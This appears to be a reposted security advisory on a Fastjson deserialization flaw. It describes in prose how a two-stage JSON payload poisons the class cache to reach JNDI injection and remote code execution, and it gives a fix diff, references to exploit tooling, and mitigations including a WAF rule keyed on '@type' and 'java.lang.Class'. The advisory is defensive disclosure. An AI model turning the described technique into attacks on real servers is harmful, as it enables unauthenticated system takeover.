DEV Community

CVE Reports
CVE Reports

Posted on • Originally published at cvereports.com

CVE-2025-70974: Fastjson RCE: The 'Safe' Cache That Killed Your Server

#security #cve #cybersecurity

Fastjson RCE: The 'Safe' Cache That Killed Your Server

Vulnerability ID: CVE-2025-70974
CVSS Score: 10.0
Published: 2026-01-09

A critical deserialization vulnerability in Alibaba Fastjson < 1.2.48 allows attackers to bypass security checks by poisoning the internal class cache, leading to unauthenticated remote code execution (RCE) via JNDI injection.

TL;DR

Attackers can bypass Fastjson's autoType protection by using a two-stage JSON payload. The first stage uses java.lang.Class to force a malicious class into the internal cache. The second stage instantiates that class, bypassing the blacklist check because the parser trusts cached classes blindly. This results in JNDI injection and full system takeover.

⚠️ Exploit Status: ACTIVE

Technical Details

  • Attack Vector: Network (JSON Payload)
  • CVSS: 10.0 (Critical)
  • Exploit Status: Weaponized / Active
  • Weakness: CWE-502 / CWE-829
  • Prerequisites: None (Unauthenticated)
  • Impact: Remote Code Execution (System Takeover)

Affected Systems

  • Java Applications using Fastjson
  • Spring Boot applications with Fastjson configured
  • Legacy Enterprise Java Middleware
  • fastjson: < 1.2.48 (Fixed in: 1.2.48)

Code Analysis

Commit: 153c306

Fastjson 1.2.48 security fix reducing cache reliance

@@ -1039,7 +1039,7 @@ public class TypeUtils {
-        return loadClass(className, null);
+        return loadClass(className, null, false);
Enter fullscreen mode Exit fullscreen mode

Exploit Details

  • Vulhub: Dockerized environment for reproducing the cache poisoning attack
  • GitHub: Various JNDI exploit tools often integrated with Fastjson payloads

Mitigation Strategies

  • Upgrade Fastjson library immediately
  • Enable SafeMode to disable autoType completely
  • Migrate to alternative JSON libraries (Jackson/Gson)

Remediation Steps:

  1. Identify all dependencies using fastjson < 1.2.48.
  2. Update maven/gradle dependency to version 1.2.83 or 2.x.
  3. If update is not possible, implement a WAF rule blocking JSON containing '@type' and 'java.lang.Class'.
  4. Enable SafeMode in code: ParserConfig.getGlobalInstance().setSafeMode(true);

References

Read the full report for CVE-2025-70974 on our website for more details including interactive diagrams and full exploit analysis.

Top comments (0)